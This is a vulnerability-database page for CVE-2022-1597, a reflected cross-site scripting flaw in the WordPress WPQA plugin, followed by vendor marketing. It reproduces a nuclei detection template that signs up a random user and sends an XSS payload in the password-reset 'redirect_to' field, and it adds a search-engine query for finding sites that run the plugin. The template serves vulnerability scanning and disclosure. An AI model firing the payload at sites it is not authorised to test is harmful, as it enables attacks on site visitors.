Lucene search
K

WordPress WPQA <5.4 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

WordPress WPQA <5.4 - Cross-Site Scripting, reflected XSS vulnerability, upgrade to version 5.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Cross-site Scripting in 2Code Wpqa_Builder
16 May 202215:33
githubexploit
ATTACKERKB
CVE-2022-1597
8 Jun 202210:15
attackerkb
Circl
CVE-2022-1597
8 Jun 202214:42
circl
CNNVD
WordPress plugin WPQA 跨站脚本漏洞
8 Jun 202200:00
cnnvd
CNVD
WordPress WPQA plugin cross-site scripting vulnerability
13 Jun 202200:00
cnvd
CVE
CVE-2022-1597
6 Jun 202208:51
cve
Cvelist
CVE-2022-1597 WPQA < 5.4 - Reflected Cross-Site Scripting
6 Jun 202208:51
cvelist
NVD
CVE-2022-1597
8 Jun 202210:15
nvd
OSV
CVE-2022-1597
8 Jun 202210:15
osv
Patchstack
WordPress WPQA premium plugin < 5.4 - Reflected Cross-Site Scripting (XSS) vulnerability
10 May 202200:00
patchstack
Rows per page
id: CVE-2022-1597

info:
  name: WordPress WPQA <5.4 - Cross-Site Scripting
  author: veshraj
  severity: medium
  description: |
    WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
  remediation: |
    Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1597
    - https://github.com/trhacknon/Pocingit
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1597
    cwe-id: CWE-79
    epss-score: 0.0291
    epss-percentile: 0.85247
    cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 2code
    product: wpqa_builder
    framework: wordpress
    google-query: inurl:/wp-content/plugins/wpqa
  tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code,vuln
variables:
  user: "{{to_lower(rand_base(5))}}"
  pass: "{{user}}{{to_lower(rand_base(3))}}"
  redirect_to: '"><img src=x onerror=alert(document.domain)>'

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
        Content-Type: application/x-www-form-urlencoded

        user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
        Content-Type: application/x-www-form-urlencoded

        user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{redirect_to}}'
          - '"success":1'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b86f8a423c5ecae21ffa36fd1552e69deee0555d1f513276a464cf23264eede20220572e00f95717c0ae9855806e0dc7c589e418ce24cd669528c31c72611201fd0a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 3.16.1
EPSS0.0291
30